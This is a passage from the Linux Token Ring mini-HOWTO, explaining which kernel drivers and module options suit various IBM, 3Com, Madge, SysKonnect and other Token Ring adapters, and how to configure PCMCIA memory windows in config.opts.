Token–Ring mini–HOWTO Mike Phillips mikep@linuxtr.net Tom Gall tom_gall@vnet.ibm.com Mike Eckhoff Revision History Revision 5.00 2002–01–23 Revised by: mlp Updated to reflect the current state of Token Ring with Linux Revision 4.3 29 March 2000 Revised by: tg Brought up to date. Revision 4.1 7 January 1998 Revised by: me v4.1 released by Mike This howto is designed to help you get up and running using a Token Ring adaptor to access the network. Generally speaking Section 3 will tell you which driver you need based on the adaptor card you have. # Table of Contents 1. **Introduction** ..................................................................................................................................................... 1 1.1. Special Thanks .................................................................................................................................. 1 1.2. Copyright Information ...................................................................................................................... 1 1.3. Disclaimer ......................................................................................................................................... 2 1.4. New Versions .................................................................................................................................... 2 1.5. Credits ............................................................................................................................................... 2 1.6. Feedback ........................................................................................................................................... 2 2. **Hardware requirements** ........................................................................................................................................ 4 3. **Which driver should I use?** ........................................................................................................................... 6 3.1. 
Drivers/Adapter Specifics ................................................................................................................. 7 3.1.1. Kernel Module Aliases and Parameters ............................................................................ 8 3.1.2. IBMTR Driver .................................................................................................................. 8 3.1.3. Olympic Driver ................................................................................................................. 9 3.1.4. Lanstreamer Driver ......................................................................................................... 10 3.1.5. 3Com 3C359 Driver ........................................................................................................11 3.1.6. SysKonnect adapters ....................................................................................................... 13 3.1.7. PCMCIA ................................................................................................................................. 15 3.1.8. Madge Supplied Drivers ................................................................................................. 18 3.1.9. Olicom Drivers ............................................................................................................... 19 4. **Known problems** ........................................................................................................................................... 20 5. **VMWare and Token Ring** ........................................................................................................................................ 21 6. **Commonly asked Questions** .............................................................................................................................. 22 A. 
**GNU Free Documentation License** .............................................................................................................. 23 A.1. 0. PREAMBLE .......................................................................................................................................... 24 A.2. 1. APPLICABILITY AND DEFINITIONS .................................................................................. 25 A.3. 2. VERBATIM COPYING ....................................................................................................................... 26 A.4. 3. COPYING IN QUANTITY .............................................................................................................. 27 A.5. 4. MODIFICATIONS ................................................................................................................................... 28 A.6. 5. COMBINING DOCUMENTS .......................................................................................................... 30 A.7. 6. COLLECTIONS OF DOCUMENTS ........................................................................................... 31 A.8. 7. AGGREGATION WITH INDEPENDENT WORKS ........................................................................... 32 A.9. 8. TRANSLATION ................................................................................................................................... 33 # Table of Contents [A.10. 9. TERMINATION](#) .................................................................................................................................34 [A.11. 10. FUTURE REVISIONS OF THIS LICENSE](#) ..................................................................................35 1. Introduction Welcome to the Linux Token Ring mini–howto. We hope you find the information contained within helpful. If you have any problems with the drivers that are not talked about in this howto, feel free to email me at <mikep@linuxtr.net>. 
You may also wish to join the Linux on Token Ring Listserv by mailing <majordomo@linuxtr.net> with the body containing: ``` subscribe linux-tr ``` The latest and greatest information, drivers, patches, bug fixes, etc, etc can always be found at the Linux Token Project site. 1.1. Special Thanks Thanks to Mark Swanson, Peter De Schrijver, David Morris, Paul Norton and everyone else who has contributed to the Token Ring code and drivers over the years. Thanks also to the many people and companies who have provided hardware and technical documents to enable the drivers to be written in the first place. Special Thanks to Mike Eckhoff the originator of this HOWTO, and Tom Gall for the previous version, and to Matthew Marsh for hosting the website and mailing list! And, finally, thanks to all to subscribers to the linux–tr mailing list who have provided support, feedback, testing and thanks over the years. It wouldn't have been worth it without your continued support and gratitude. 1.2. Copyright Information This document is copyright (c) 1995–1998 by Michael Eckhoff, copyright(c) 2000 by Tom Gall and copyright (c) 2001 by Mike Phillips. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.1 or any later version published by the Free Software Foundation, with no Invariant sections, with no Front−Cover Texts, and with no Back−Cover Texts. A copy of the license is included in Appendix A If you have any question, please contact <linux−howto@linuxdoc.org> 1.3. Disclaimer No liability for the contents of this document can be accepted. Use the concepts, examples and other content at your own risk. As this is a new edition of this document, there may be errors and inaccuracies, that may of course be damaging to your system. Proceed with caution, and although this is highly unlikely, the authors do not take any responsibility for that. 
All copyrights are held by their respective owners, unless specifically noted otherwise. Use of a term in this document should not be regarded as affecting the validity of any trademark or service mark. Naming of particular products or brands should not be seen as endorsements. You are strongly recommended to take a backup of your system before major installation and backups at regular intervals. 1.4. New Versions The latest version of this document can always be found at Linux Token Ring Project under the Documentation section. The latest version of this HOWTO will always be made available on the Linux Token Ring Project website, in a variety of formats: - HTML, - Plain text, - Adobe Acrobat pdf, - Postscript, - SGML source. 1.5. Credits In this version I have the pleasure of acknowledging: IBM for providing hardware, technical documentation and technical support when the tech docs didn't quite seem enough. Madge for providing their hardware to test with. 3Com for proving the technical documents to allow the 3c359 driver to be developed. 1.6. Feedback Feedback is most certainly welcome for this document. Without your submissions and input, this document wouldn't exist. Please send your additions, comments and criticisms to the following email address: <mikep@linuxtr.net> 2. **Hardware requirements** Make sure that you have a Token Ring card that is supported from the list below. Many PCI, ISA and even the odd MCA cards are now supported. Check [http://www.linuxtr.net](http://www.linuxtr.net) for the latest information. Cards that are reported to work: **3COM** - 3C389 PCMCIA - 3C619, 3C619B or 3C619C Token Link - 3C319 Velocity ISA - 3C359 Velocity XL – PCI - 3C339 Velocity PCI **IBM** - **PCI.** PCI Token Ring Adapter; PCI Wake on Lan Token Ring Adapter; 16/4 Token Ring PCI Adapter 2, Wake on Lan, and Wake on Lan Special; High Speed 100/16/4 Token Ring Adapter, Token Ring 16/4 Management Adapter. 
- **Cardbus.** 16/4 Token Ring Adapter - **LanStreamer.** PCI: Auto LanStreamer, Triple Lanstreamer; MCA: LanStreamer MC16, Lanstreamer MC32, AutoLanstreamer MC32, Dual Lanstreamer MC32 - **ISA.** Auto 16/4 Token Ring Adapter, 16/4 Token Ring Adapter, Turbo 16/4 Token Ring Adapter, Auto Wake Token Ring Adapter. - **PCMCIA.** Turbo 16/4 PC Card, Turbo 16/4 PC Card 2, Auto 16/4 Credit Card Adapter, 16/4 Credit Card Adapter, 16/4 Credit Card Adapter II - **Tropic MCA.** 16/4 Token Ring Adapter/A, Auto 16/4 Token Ring Adapter **Olicom** - RapidFire 3139, 3140, 3141, and 3540 - OC 3136 - OC 3137 - OC 3118 - OC 3129 **Madge** - 51–02 Smart 16/4 PCI - 20–03 16/4 Cardbus Adapter Mk2 - 51–04 Smart 16/4 PCI Ringnode Mk3 - 51–09 Smart 16/4 Fiber PCI Ringnode - 51–07 Smart 100/16/4 PCI–HS Ringnode - 51–05 Smart 100/16/4 PCI Ringnode - 20–01 Smart 16/4 PCMCIA - 60–07 Presto PCI 2000 - 60–06 Presto PCI Plus - 60–05 Presto PCI - 53–05 Smart Mk4 PCI Adapter (low profile) • 31-40 Rapidfire 3140V2 16/4 PCI Adapter SysKonnect • TR4/16(+) SK–4190 ISA • TR4/16(+) SK–4590 PCI • TR4/16(+) SK–4591 PCI SMC • Tokencard Elite (8115T) • Tokencard Elite/A MCA (8115T/A) Intel • TokenExpress PRO • TokenExpress 16/4 Cards that may cause problems: **Token–Ring Network 16/4 Adapter II.** This adapter will NOT work. Do not confuse this card with the IBM Token Ring adapter II (4mbit) which does. It is a DMA/Busmaster adapter for ISA. **3Com TokenLink Velocity ISA.** You may or may not get this one to work. I have had reports of people running it without problems, and others who get errors left and right. 3. Which driver should I use? The realm of Token Ring drivers on Linux has expanded quite a bit in the last couple of years. It’s not just `ibmtr` anymore! So as a result this map will tell you given a card which driver you should try and the recommended minimum kernel version (if any). 
3COM - 3C389 PCMCIA — `ibmtr_cs` - 3C619, 3C619B or 3C619C Token Link — `ibmtr` - 3C319 Velocity ISA — try `ibmtr` - 3C359 Velocity XL – PCI — driver available from [http://www.linuxtr.net](http://www.linuxtr.net) - 3C339 Velocity PCI — `tms380tr` IBM - PCI Token Ring Adaptor — `olympic` - PCI Wake on Lan Token Ring Adaptor — `olympic` - 16/4 Token Ring PCI Adaptor 2, Wake On Lan, and Wake on Lan Special — `olympic` - High Speed 100/16/4 Token Ring — `olympic` - Turbo 16/4 ISA adapter — `ibmtr` - Token Ring Auto 16/4 ISA adapter — `ibmtr` - Token Ring Auto 16/4 adapter /A — `ibmtr` - Token Ring 16/4 adapter /A — `ibmtr` - Token Ring adapter /A — `ibmtr` - Token Ring adapter II (4 Megabit only) — `ibmtr` - 16/4 ISA Token Ring card (16bit) — `ibmtr` - 16/4 ISA Token Ring card (8bit) — `ibmtr` - All LANStreamers — `lanstreamer` - PCMCIA – Turbo 16/4 — `ibmtr_cs` - PCMCIA – 16/4 — `ibmtr_cs` - Cardbus – 16/4 – `olympic`, kernel v.2.4.3 or greater Olicom - RapidFire 3139, 3140, 3141, and 3540 - OC 3136 - OC 3137 - OC 3118 - OC 3129 For these Olicom cards, see their website [http://www.olicom.com](http://www.olicom.com) for drivers. You will need a 2.2.x series kernel. Madge - 51–02 Smart 16/4 PCI - 20–03 16/4 Cardbus Adapter Mk2 - 51–04 Smart 16/4 PCI Ringnode Mk3 - 51–09 Smart 16/4 Fiber PCI Ringnode - 51–07 Smart 100/16/4 PCI–HS Ringnode • 51−05 Smart 100/16/4 PCI Ringnode • 20−01 Smart 16/4 PCMCIA • 60−07 Presto PCI 2000 • 60−06 Presto PCI Plus • 60−05 Presto PCI For these Madge cards you'll want to visit their site http://www.madge.com for drivers and get the 2.31 Madge drivers. You will need either a 2.0.36 or 2.2.5 as a minimum. 
2.41 drivers: • 51−05 Smart Mk4 PCI Adapter • 53−05 Smart Mk4 PCI Adapter (low profile) • 31−40 Rapidfire 3140V2 16/4 PCI Adapter • 20−03 Smart 16/4 Cardbus Mk2 • 51−04 Smart 16/4 PCI Ringnode Mk3 • 60−07 Presto PCI 2000 • 60−06 Presto PCI Plus • 60−05 Presto PCI According to the Madge README file the 2.41 driver has been tested on uniprocessor and SMP kernel versions: 2.0.36, 2.2.5−15, 2.2.10, 2.2.12−20, 2.4.2−2. Other Madge cards are reportedly based on the Texas Instruments tms380 chipset and thus as of the 2.3.26 kernel you can try the tms380tr driver. SysKonnect • TR4/16(+) SK−4190 ISA • TR4/16(+) SK−4590 PCI • TR4/16(+) SK−4591 PCI In the 2.2.x series of kernels try sktr. In the 2.3.x and greater series try the tms380tr driver. SMC • Tokencard Elite (8115T) • Tokencard Elite/A MCA (8115T/A) Driver is included as part of the 2.3.38+ kernel. Intel • TokenExpress PRO • TokenExpress 16/4 Support for these cards is currently under development. Check http://www.linuxtr.net for status. 3.1. Drivers/Adapter Specifics Here we'll describe the different options and configurations available for each of the available drivers. 3.1.1. Kernel Module Aliases and Parameters Most drivers accept arguments in the form of module parameters (with the exception of the special case of PCMCIA, which is fully described below). Kernel modules are specified in the file /etc/conf.modules or /etc/modules.conf depending upon which version of modutils you've got. You can directly modify this file or use the tools builtin to your specific distribution. These distribution specific tools are beyond the scope of this document, but you can always directly modify the modules.conf file by hand to get things up and running and then figure out how your distribution handles these files. For example, Debian has several files in the /etc/modutils directory and from these builds the modules.conf file. Kernel modules aliases are utilized to associate a particular name with a kernel module. 
For token ring, this is used to assign drivers for each of the token ring interfaces so that the system scripts know which driver to insert when you bring an interface up. The format of the alias lines are: ``` alias module_name interface ``` Usually, the only line you'll need for the token ring networking would be something like: ``` alias olympic tr0 ``` This binds the olympic driver to the tr0 interface so when you type: ``` ifconfig tr0 up ``` if the tr0 interface is not already loaded, the system will insert the olympic driver, which in turn will find the network card and create the tr0 network device. Kernel modules parameters are specified in the following format: ``` options module_name parameter_1=XXX [parameter2=YYY ...] ``` Where the modules_name is the name of the driver, i.e. olympic, ibmtr, 3c359 and the parameters are those available for each driver. See either the following sections for driver specifics or check out the drivers source code. For example, if you wanted to set the Olympic driver to 16 mbps operation and with a default buffer size of 8192 bytes, you would use the following line: ``` options olympic ringspeed=16 pkt_buf_sz=8192 ``` 3.1.2. IBMTR Driver IBM Tropic Chipset Based Token Ring Adapters This is the original token ring driver in the kernel and supports almost all adapters that use the IBM Tropic chipset, including the IBM ISA, ISA/Pnp, and a multitude of adapters from other manufacturers. The IBM Turbo 16/4 ISA/PnP adapter will, in fact, work fine with the ibmtr driver. In older drivers you had to run the card in Auto 16/4 compatibility mode. The simplest way to set this is to use the LANAID disks sent with the card and run the command: ``` LANAIDC /FAST=AUTO16 ``` You should then use LANAIDC or LANAID to configure the card according to documentation. The latest drivers for the Turbo Adapters will recognize these adapters and configure them straight out of the box. 
You may have to either turn off isapnp support in the kernel or modify your isapnp.conf file to enable the adapter.

Options:

Perusal of the ibmtr source code may lead you to believe that the driver can take three parameters; in reality, however, the driver doesn't take any. These parameters are a holdover from the early stages of the driver and were only intended to force the driver to test restricted addresses when looking for adapters. The information on these options is included here for completeness only.

- **io**: Specifies the I/O ports that the driver will check for the presence of any cards. All Tropic based ISA adapters, or adapters emulating the ISA cards, will be found on either port 0xA20 or 0xA24. If you know that your adapter is configured for 0xA24 and/or that probing on port 0xA20 will cause problems with your machine, use io to force the driver to check a specific port only. The Turbo adapters (including the confusingly named latest Auto 16/4 cards) can have their I/O regions located anywhere permitted by the PnP specification. This location is found using the new turbo detection code and no parameters are required.

- **irq & mem**: These two options were used to tell the driver exactly which irq to use and where the shared ram for the adapter could be found. Both are now totally redundant, as the interrupt line and the location of the shared ram are obtained directly by interrogating the adapter.

### 3.1.3. Olympic Driver

IBM PCI Pit/Pit-Phy/Olympic chipset based token ring cards

Options:

The driver accepts four options: ringspeed, pkt_buf_sz, message_level and network_monitor.
These options can be specified differently for each card found, i.e. if you have two olympic adapters in your machine and want to assign a ring speed of 16mbps to the first adapter but a ring speed of 4mbps to the second adapter, your options line would read:

```
options olympic ringspeed=16,4
```

It should be noted, however, that the driver assigns values to the adapters in the order they are discovered, which is usually the order they appear on the PCI bus. A little trial and error may be required to be certain which adapter is receiving which configuration option.

- **ringspeed**: Has one of three settings: 0 (default), 4 or 16. 0 will make the card autosense the ringspeed and join at the appropriate speed; this will be the default option for most people. 4 or 16 allow you to explicitly force the card to operate at a certain speed. The card will fail if you try to insert it at the wrong speed. (Although some hubs will allow this, so be *very* careful.) The main purpose for explicitly setting the ring speed is for when the card is first on the ring. In autosense mode, if the card cannot detect any active monitors on the ring it will not open, so you must re-init the card at the appropriate speed. Unfortunately, at present the only way of doing this is rmmod and insmod, which is a bit tough if the driver is compiled into the kernel. The driver does support 100 mbps full duplex operation; this is automatically detected by the adapter when connected to an appropriate switch.

- **pkt_buf_sz**: This is the initial receive buffer allocation size. This will default to 4096 if no value is entered. You may increase performance of the driver by setting this to a value larger than the network packet size, although the driver now re-sizes buffers based on MTU settings as well.

- **message_level**: Controls the level of messages created by the driver. Defaults to 0, which only displays start-up and critical messages. Presently any non-zero value will display all soft messages as well.
NB: This does not turn debugging messages on; that must be done by modifying the source code.

- **network_monitor**: Any non-zero value will provide a quasi network monitoring mode. All unexpected MAC frames (beaconing etc.) will be received by the driver and the source and destination addresses printed. Also, an entry will be added in /proc/net called olympic_tr%d, where tr%d is the registered device name, i.e. tr0, tr1, etc. This displays low level information about the configuration of the ring and the adapter. This feature has been designed for network administrators to assist in the diagnosis of network / ring problems. (This used to be OLYMPIC_NETWORK_MONITOR, but has now changed to allow each adapter to be configured differently and to alleviate the necessity to re-compile olympic to turn the option on.)

### Multi-card

The driver will detect multiple cards and will work with shared interrupts; each card is assigned the next token ring device, i.e. tr0, tr1, tr2. The driver should also happily reside in the system with other drivers. It has been tested with ibmtr.c running. I have had multiple cards in the same system, all sharing the same interrupt and working perfectly fine together. This is also true for the Cardbus Olympic adapters: I have quite happily had a Cardbus adapter and a regular 16 bit PCMCIA token ring adapter working together in the same laptop.

### Variable MTU size

The driver can handle an MTU size up to either 4500 or 18000 depending upon ring speed. The driver also changes the size of the receive buffers as part of the MTU re-sizing, so if you set mtu = 18000, you will need to be able to allocate 16 * (sk_buff with 18000 buffer size), call it 18500 bytes per ring position = 296,000 bytes of memory space, plus of course anything necessary for the tx sk_buffs. Remember this is per card, so if you are building routers, gateways etc., you could start to use a lot of memory real fast.

### 3.1.4.
Lanstreamer Driver

IBM PCI/MCA Lanstreamer chipset based token ring cards

#### Options:

The driver accepts three options: ringspeed, pkt_buf_sz and message_level. These options can be specified differently for each card found, i.e. if you have two lanstreamer adapters in your machine and want to assign a ring speed of 16mbps to the first adapter but a ring speed of 4mbps to the second adapter, your options line would read:

```
options lanstreamer ringspeed=16,4
```

It should be noted, however, that the driver assigns values to the adapters in the order they are discovered, which is usually the order they appear on the PCI/MCA bus. A little trial and error may be required to be certain which adapter is receiving which configuration option.

- **ringspeed**: Has one of three settings: 0 (default), 4 or 16. 0 will make the card autosense the ringspeed and join at the appropriate speed; this will be the default option for most people. 4 or 16 allow you to explicitly force the card to operate at a certain speed. The card will fail if you try to insert it at the wrong speed. (Although some hubs will allow this, so be *very* careful.) The main purpose for explicitly setting the ring speed is for when the card is first on the ring. In autosense mode, if the card cannot detect any active monitors on the ring it will not open, so you must re-init the card at the appropriate speed. Unfortunately, at present the only way of doing this is rmmod and insmod, which is a bit tough if the driver is compiled into the kernel.

- **pkt_buf_sz**: This is the initial receive buffer allocation size. This will default to 4096 if no value is entered. You may increase performance of the driver by setting this to a value larger than the network packet size, although the driver now re-sizes buffers based on MTU settings as well.

- **message_level**: Controls the level of messages created by the driver. Defaults to 0, which only displays start-up and critical messages.
Presently any non-zero value will display all soft messages as well. NB: This does not turn debugging messages on; that must be done by modifying the source code.

**Network Monitor.** The Lanstreamer driver does support a network monitor mode similar to the olympic driver; however, it is a compile time option and not a module parameter. To enable the network monitor mode, edit lanstreamer.c and change the line:

```c
#define STREAMER_NETWORK_MONITOR 0
```

to read:

```c
#define STREAMER_NETWORK_MONITOR 1
```

All unexpected MAC frames (beaconing etc.) will be received by the driver and the source and destination addresses printed. Also, an entry will be added in /proc/net called streamer_tr. This displays low level information about the configuration of the ring and the adapter. This feature has been designed for network administrators to assist in the diagnosis of network / ring problems.

**Multi-card.** The driver will detect multiple cards and will work with shared interrupts; each card is assigned the next token ring device, i.e. tr0, tr1, tr2. The driver should also happily reside in the system with other drivers.

**Variable MTU size.** The driver can handle an MTU size up to either 4500 or 18000 depending upon ring speed. The driver also changes the size of the receive buffers as part of the MTU re-sizing, so if you set mtu = 18000, you will need to be able to allocate 16 * (sk_buff with 18000 buffer size), call it 18500 bytes per ring position = 296,000 bytes of memory space, plus of course anything necessary for the tx sk_buffs. Remember this is per card, so if you are building routers, gateways etc., you could start to use a lot of memory real fast.

### 3.1.5. 3Com 3C359 Driver

**3COM PCI TOKEN LINK VELOCITY XL TOKEN RING CARDS**

Currently the 3c359 driver is not included in the standard kernel source. To utilize the driver, you must download it from the Linux Token Ring Project web site (http://www.linuxtr.net) and patch your kernel.
Once you've downloaded the file, you can patch your kernel with the following commands:

```bash
cd /usr/src/linux
patch -p1 < 3c359-2.4.16.patch
```

or, if the patch file is gzipped:

```bash
zcat 3c359-2.4.16.patch | patch -p1
```

Then just run `make config|menuconfig|xconfig`, select the 3c359 driver from the token ring drivers section of the kernel configuration, and then compile and install the kernel and/or modules as usual.

Options:

The driver accepts three options: `ringspeed`, `pkt_buf_sz` and `message_level`. These options can be specified differently for each card found, i.e. if you have two 3c359 adapters in your machine and want to assign a ring speed of 16mbps to the first adapter but a ring speed of 4mbps to the second adapter, your options line would read:

```bash
options 3c359 ringspeed=16,4
```

It should be noted, however, that the driver assigns values to the adapters in the order they are discovered, which is usually the order they appear on the PCI bus. A little trial and error may be required to be certain which adapter is receiving which configuration option.

- **ringspeed**: Has one of three settings: 0 (default), 4 or 16. 0 will make the card autosense the ringspeed and join at the appropriate speed; this will be the default option for most people. 4 or 16 allow you to explicitly force the card to operate at a certain speed. The card will fail if you try to insert it at the wrong speed. (Although some hubs will allow this, so be *very* careful.) The main purpose for explicitly setting the ring speed is for when the card is first on the ring. In autosense mode, if the card cannot detect any active monitors on the ring, it will open at the same speed as its last opening. This can be hazardous if this speed does not match the speed you want the ring to operate at.

- **pkt_buf_sz**: This is the initial receive buffer allocation size. This will default to 4096 if no value is entered.
You may increase performance of the driver by setting this to a value larger than the network packet size, although the driver now re-sizes buffers based on MTU settings as well.

- **message_level**: Controls the level of messages created by the driver. Defaults to 0, which only displays start-up and critical messages. Presently any non-zero value will display all soft messages as well. NB: This does not turn debugging messages on; that must be done by modifying the source code.

**Multi-card.** The driver will detect multiple cards and will work with shared interrupts; each card is assigned the next token ring device, i.e. tr0, tr1, tr2. The driver should also happily reside in the system with other drivers. It has been tested with ibmtr.c running. I have had multiple cards in the same system, all sharing the same interrupt and working perfectly fine together.

**Variable MTU size.** The driver can handle an MTU size up to either 4500 or 18000 depending upon ring speed. The driver also changes the size of the receive buffers as part of the MTU re-sizing, so if you set mtu = 18000, you will need to be able to allocate 16 * (sk_buff with 18000 buffer size), call it 18500 bytes per ring position = 296,000 bytes of memory space, plus of course anything necessary for the tx sk_buffs. Remember this is per card, so if you are building routers, gateways etc., you could start to use a lot of memory real fast.

### 3.1.6. SysKonnect adapters

Information for the SysKonnect Token Ring ISA/PCI Adapter is courtesy of Jay Schulist <jschlst@samba.org>.

The Linux SysKonnect Token Ring driver works with the SysKonnect TR4/16(+) ISA, SysKonnect TR4/16(+) PCI, SysKonnect TR4/16 PCI, and older revisions of the SK NET TR4/16 ISA card. The latest information on this driver can be obtained on the Linux-SNA WWW site. Please point your browser to: http://www.linux-sna.org

Important information to be noted:

1. Adapters can be slow to open (~20 secs) and close (~5 secs), please be patient.
2.
This driver works very well when autoprobing for adapters. Why even think about those nasty io/int/dma settings of modprobe when the driver will do it all for you!

This driver is rather simple to use. Select Y to Token Ring adapter support in the kernel configuration; a choice for SysKonnect Token Ring adapters will appear. This driver supports all SysKonnect ISA and PCI adapters, so choose this option. I personally recommend compiling the driver as a module (M), but if you would like to compile it statically answer Y instead.

This driver supports multiple adapters without the need to load multiple copies of the driver. You should be able to load up to 7 adapters without any kernel modifications; if you need more, please contact the maintainer of this driver.

Load the driver either by lilo/loadlin or as a module. When loading as a module, the following command will suffice for most:

```
# modprobe sktr
```

This will produce output similar to the following (output is user specific):

```
sktr.c: v1.01 08/29/97 by Christoph Goos
tr0: SK NET TR 4/16 PCI found at 0x6100, using IRQ 17.
tr1: SK NET TR 4/16 PCI found at 0x6200, using IRQ 16.
tr2: SK NET TR 4/16 ISA found at 0xa20, using IRQ 10 and DMA 5.
```

Now just set up the device via ifconfig and add any routes you may have. After this you are ready to start sending some tokens.

Errata.
For anyone wondering where to pick up the SysKonnect adapters, please browse to http://www.syskonnect.com

Below are the settings for the SK NET TR 4/16 ISA adapters:

```
CONTENTS
1) Location of DIP-Switch W1
2) Default settings
3) DIP-Switch W1 description

DEFAULT SETTINGS

W1    1   2   3   4   5   6   7   8
ON    X
OFF       X   X   X   X   X   X   X

W1.1 = ON          Adapter drives address lines SA17..19
W1.2 - 1.5 = OFF   BootROM disabled
W1.6 - 1.8 = OFF   I/O address 0A20h

DIP-SWITCH W1 DESCRIPTION

Switches 6, 7 and 8 select the I/O address:

  6    7    8     I/O address
  ON   ON   ON    1900h
  ON   ON   OFF   0900h
  ON   OFF  ON    1980h
  ON   OFF  OFF   0980h
  OFF  ON   ON    1b20h
  OFF  ON   OFF   0b20h
  OFF  OFF  ON    1a20h
  OFF  OFF  OFF   0a20h (+)

(+) = default setting
```

### 3.1.7. PCMCIA

#### 3.1.7.1. Introduction

PCMCIA Token Ring adapters will work on all versions of the Linux kernel. Unfortunately, the road to hell is often paved with melting snowballs ;-) and there are a myriad of different combinations that can be used to get the adapters to work, all with different options, different requirements and different issues. Hopefully with this document you will be able to figure out which combination of ingredients is required and how to get the adapters up and running on your machine.

#### 3.1.7.2.
History

In the days of the 2.0.x and 2.2.x kernels, pcmcia support was only available as an external package, created and maintained by David Hinds. When the only stable kernel available was 2.0.36, life was pretty easy and with a few simple configuration options the adapters would work. With the advent of 2.2.x, ibmtr.c was completely updated, which broke the pcmcia driver (ibmtr_cs.c). The pcmcia driver was then updated to work with the new ibmtr driver and the 2.2.x kernels.

This is where the first level of complication starts. As the pcmcia_cs package is stand-alone, it has to support the various different kernels; so instead of being able to have different versions of drivers in different versions of the kernel source, the pcmcia_cs drivers must work with all kernel versions. This not only creates some ugliness in the driver itself but also causes confusion as to which version of pcmcia_cs works for the latest kernel.

At this point everything was working fine, and then along came the 2.3.x development series of kernels. The 2.3.x kernels provided their own support for pcmcia, and the ibmtr_cs driver was included in the kernel proper. So now there were two ways of getting pcmcia token ring support: either using the kernel drivers themselves or using the pcmcia_cs package. This was not too much of a problem, because only developers were using the 2.3.x kernels. Of course, this all changed when the 2.4 kernel was released and a lot more users started using it.

During late 2000 and early 2001, significant development work was done on both the standard ibmtr driver and the pcmcia driver. The original pcmcia updates included high memory support and hot-eject support. These initial updates were only for the 2.2.x kernels, and hence only included in the pcmcia_cs package. Later development saw great improvements in ibmtr and ibmtr_cs for the 2.4.x kernels.
So as of writing, 1/23/02, there are many different combinations of kernel version and driver floating around, especially considering that different distributions have released different versions of the 2.4 kernels.

### 3.1.7.3. 2.0.x kernels

If you are using one of the 2.0.x kernels, then I salute your perseverance, and really you should have got the pcmcia drivers configured and working by now :-) You will have to use the pcmcia_cs package and play with /etc/pcmcia/config.opts; see the section below about config.opts fun. Just about any version of pcmcia_cs that's been released in the last 2/3 years will work fine.

### 3.1.7.4. 2.2.0 - 2.2.6 kernels

These were the series of kernels where the pcmcia driver didn't work at all. It's probably just easiest to upgrade the kernel to a later version. If you really do need to get this up and running, then a recent pcmcia_cs is required and you should be able to grab the ibmtr.c and ibmtr.h from a 2.2.7 - 2.2.16 kernel and use them (note: no greater than 2.2.16 !!). You also have to do the config.opts mangling; see the section on setting all this up.

### 3.1.7.5. 2.2.7 - 2.2.16 kernels

These kernels are well supported: simply use the pcmcia_cs package and play with the config.opts file.

### 3.1.7.6. 2.2.17 - 2.2.19 kernels

The pcmcia driver was updated for these kernels to eliminate the need for the config.opts mangling. You'll need pcmcia_cs of at least 3.1.24, although it is probably better just to grab the latest version. Simply compile up pcmcia_cs and you're done. There is no need to play with config.opts; in fact, if you've been running a previous version that did have the ibmtr_cs line in config.opts, it would be a very good idea to remove or comment out the line. The new driver allocates the entire 64k for shared ram and it needs to be aligned on a 64k boundary; if you've got a previous srambase value not on a 64k boundary, the driver will barf and the kernel will panic.

### 3.1.7.7.
2.4.0 - 2.4.4 (non Redhat) kernels

Use the built-in kernel pcmcia driver and play with config.opts. If you want to use the latest and greatest version of the driver with the high memory and hot-swap support, you can download the patch and patch up your kernel. Then the line in `config.opts` can be removed and everything will work fine.

### 3.1.7.8. 2.4.4-ac11 and later kernels

These kernels include the new drivers, so simply compile up the drivers, ensure that there is no configuration line in `config.opts`, and away you go.

### 3.1.7.9. 2.4.2 mangled, i.e. Redhat 7.1

When RedHat released 7.1 with the 2.4.2 kernel they modified the kernel (as they always do) and included the updated ibmtr/ibmtr_cs driver from the web site. If you're lucky this may work straight out of the box (again, no need for the `ibmtr_cs` line in `config.opts`); if not, then it is probably easiest to upgrade to the latest 2.4.x kernels and use the drivers there. (The reason being that while I will work out how to get around a distribution-caused problem, I will not provide support for them. I'll answer questions and give help because I'm a nice guy, but I am not going to provide driver updates against distributions. Official support is for the drivers in the kernels available from the official kernel mirrors.)

### 3.1.7.10. 2.4.x kernels and pcmcia_cs

There is no need to use pcmcia_cs with the 2.4 kernels to get the token ring adapters up and running, but I appreciate that some of you may need to use pcmcia_cs to get other adapters working that are not supported properly in the kernel. The pcmcia_cs package will not work with the latest drivers; it may work with the 2.4.0-2.4.4 drivers. I am currently in two minds about providing support with pcmcia_cs for the 2.4 kernels; you can ask me directly or check the web site every now and then to see if anything has changed.

### 3.1.7.11.
Config.opts mangling (or how to send yourself insane)

This is the hardest part of getting the pcmcia adapters working with the drivers that need the `ibmtr_cs` line in `/etc/pcmcia/config.opts`. No set of values is guaranteed to work the same on a different machine. It really is a case of trial and error, but being forewarned and forearmed with a little bit of knowledge can make the process a whole lot easier.

"Hey, I don't care, just give me something that works."

OK, try this; it works in most situations. If it doesn't, you have to read the rest of the section anyway. Just insert the following line in `/etc/pcmcia/config.opts`:

```bash
module "ibmtr_cs" opts "mmiobase=0xd2000 srambase=0xd4000"
```

then restart pcmcia and insert the adapter.

"OK, that didn't work, bring on the pain."

The pcmcia driver needs to allocate two areas of memory to operate properly. Every area of memory allocated must be aligned on the same boundary as the size of the area being allocated, i.e. a block 8K in size must be on an 8K boundary (0xc8000, 0xca000, 0xcc000, 0xce000, 0xd0000, 0xd2000) and a 16K block must be on a 16K boundary (0xc8000, 0xcc000, 0xd0000, 0xd4000). All memory areas must be allocated within the ISA address space, 0xC0000-0xDFFFF. Theoretically you should be able to use anywhere within this area, although experience has shown that most machines hide stuff in the 0xc0000-0xc9fff area. Some machines have even been known to use the 0xd0000-0xd1fff area without telling anybody (some Thinkpads !!). So you really want to stick with memory allocations in the 0xcc000-0xdffff range. Of course, the two memory areas cannot overlap either ;)

The first area of memory is an 8K area for the memory mapped input/output (MMIO) and must be placed on an 8K boundary. This area of memory is not usually the cause of any problems and can be placed pretty much anywhere; recommended values are: 0xcc000, 0xd0000, 0xd2000, 0xd4000.
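If you want to sanity-check candidate addresses before editing config.opts, the alignment rule above (an address is valid when it divides evenly by the block size) can be verified with a quick shell sketch; the addresses below are just the example values from the text:

```shell
# An address sits on a boundary when (address % block_size) == 0.
# 8K MMIO blocks need an 8K (0x2000) boundary:
for addr in 0xcc000 0xd0000 0xd2000 0xd4000; do
    printf '%s on 8K boundary: %d\n' "$addr" $(( addr % 0x2000 == 0 ))
done
# 16K shared-RAM blocks need a 16K (0x4000) boundary:
for addr in 0xd0000 0xd4000 0xd8000; do
    printf '%s on 16K boundary: %d\n' "$addr" $(( addr % 0x4000 == 0 ))
done
```

All of the values listed print 1 (aligned). Note that 0xd2000 would fail the 16K check, which is why it is only suggested for the 8K MMIO area and not for the shared memory.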
